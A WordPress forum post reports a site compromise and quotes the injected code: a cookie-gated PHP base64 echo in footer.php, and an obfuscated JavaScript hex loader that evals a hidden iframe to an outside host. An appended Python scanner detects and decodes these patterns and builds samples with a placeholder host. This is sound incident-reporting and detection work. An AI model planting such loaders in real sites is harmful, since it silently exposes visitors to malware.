• The yahg bug referred to here just happened in my WordPress system running 2.5.1 in a different form. This previously happened on the previous 2.3.x system back in March exactly like the description in the link above.

    The server is running FC6 Fedora with Apache and very limited server access. It modified the active theme’s footer.php.

    The generated output was :-

    </div> <!-- .content -->
    
    	<script>function
        EE28C5BB86B6E59028669F5CDC87F6F8(CF2908786055451B){return(parseInt(
        CF2908786055451B,16));}function E417D2B635CB5916ED753C59F6166C(
        DCCEDD4FB8B32634B73){function DE1B365014D0708B785C319(){var
        EE79D2C759494C6B00D1F4FDC747343=2;return EE79D2C759494C6B00D1F4FDC747343;}var
        E60247718C17F3D8F853817B5="";for(C9B1DAB222ED47955E124DB6F83A9=0;
        C9B1DAB222ED47955E124DB6F83A9<DCCEDD4FB8B32634B73.length;
        C9B1DAB222ED47955E124DB6F83A9+=DE1B365014D0708B785C319()){
        E60247718C17F3D8F853817B5+=( String.fromCharCode(
        EE28C5BB86B6E59028669F5CDC87F6F8(DCCEDD4FB8B32634B73.substr(
        C9B1DAB222ED47955E124DB6F83A9,DE1B365014D0708B785C319()))));}eval(
        E60247718C17F3D8F853817B5);}E417D2B635CB5916ED753C59F6166C("
        646F63756D656E742E777269746528223C696672616D65207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E22293B
        ");</script>
    	<div class="clear"></div>
    </div> <!-- Close Page -->

    It attached itself to the top of the K2 theme footer.php.

    <?php
    if (!isset($_COOKIE["yahg"])) echo base64_decode('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');
     /* K2 Hook */ do_action('template_after_content'); ?>
    
    	<div class="clear"></div>
    </div> <!-- Close Page -->

    I have no idea how it modified the file. The date/time were the same as the offsite copy. Nothing else in the system was affected, so I’d guess that it was a WordPress vulnerability. Just bringing it to your attention.

  • The topic ‘yahg vunerability again’ is closed to new replies.
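An added example, not part of the original post: a static scanner for the two patterns shown above, the cookie-gated `echo base64_decode(...)` in a theme file and the hex-string loader in rendered output, which decodes each layer without executing it and reports any hidden iframe. The names `scan`, `SAMPLE_JS`, `SAMPLE_PAGE` and `SAMPLE_PHP` are hypothetical, the sample host is a placeholder, and the code assumes the base64 blob decodes to the script seen in the generated output.

```python
import base64
import binascii
import re

# Cookie-gated echo of a base64 blob, as found in the modified footer.php.
PHP_INJECT = re.compile(
    r"""isset\(\s*\$_COOKIE\[\s*["'](\w+)["']\s*\]\s*\)\s*\)\s*echo\s+"""
    r"""base64_decode\(\s*["']([A-Za-z0-9+/=\s]+)["']""")
# A long run of hex pairs passed as a string argument, as in the rendered page.
HEX_ARG = re.compile(r"""\(\s*["']\s*((?:[0-9A-Fa-f]{2}){20,})\s*["']\s*\)""")
HIDDEN_IFRAME = re.compile(
    r"""<iframe[^>]*src=["']?([^\s"'>]+)[^>]*display\s*:\s*none""", re.I)


def scan(text):
    """Return (kind, detail) findings; payloads are decoded, never executed."""
    findings, layers = [], [text]
    for m in PHP_INJECT.finditer(text):
        findings.append(("php-cookie-gated-base64", m.group(1)))
        try:
            layers.append(base64.b64decode(m.group(2)).decode("latin-1"))
        except binascii.Error:
            findings.append(("undecodable-base64", m.group(1)))
    for m in HEX_ARG.finditer("\n".join(layers)):
        # Same transform as the loader: two hex digits -> one character.
        decoded = bytes.fromhex(m.group(1)).decode("latin-1")
        findings.append(("hex-eval-payload", decoded))
        for frame in HIDDEN_IFRAME.finditer(decoded):
            findings.append(("hidden-iframe", frame.group(1)))
    return findings


# Constructed samples (not the payload from the post); the host is a placeholder.
SAMPLE_JS = ('document.write("<iframe src=http://injected.example '
             'style=display:none></iframe>");')
SAMPLE_PAGE = ('<script>function d(h){/* hex decoder + eval */}d("%s");</script>'
               % SAMPLE_JS.encode().hex().upper())
SAMPLE_PHP = ('<?php\nif (!isset($_COOKIE["yahg"])) echo base64_decode(\'%s\');\n'
              ' /* K2 Hook */ do_action(\'template_after_content\'); ?>'
              % base64.b64encode(SAMPLE_PAGE.encode()).decode())

if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_PHP):
        print(kind, "->", detail)
```

Run over the contents of each theme file and over a fetched copy of the rendered page, since the post's file timestamps matched the offsite copy and would not have flagged the change.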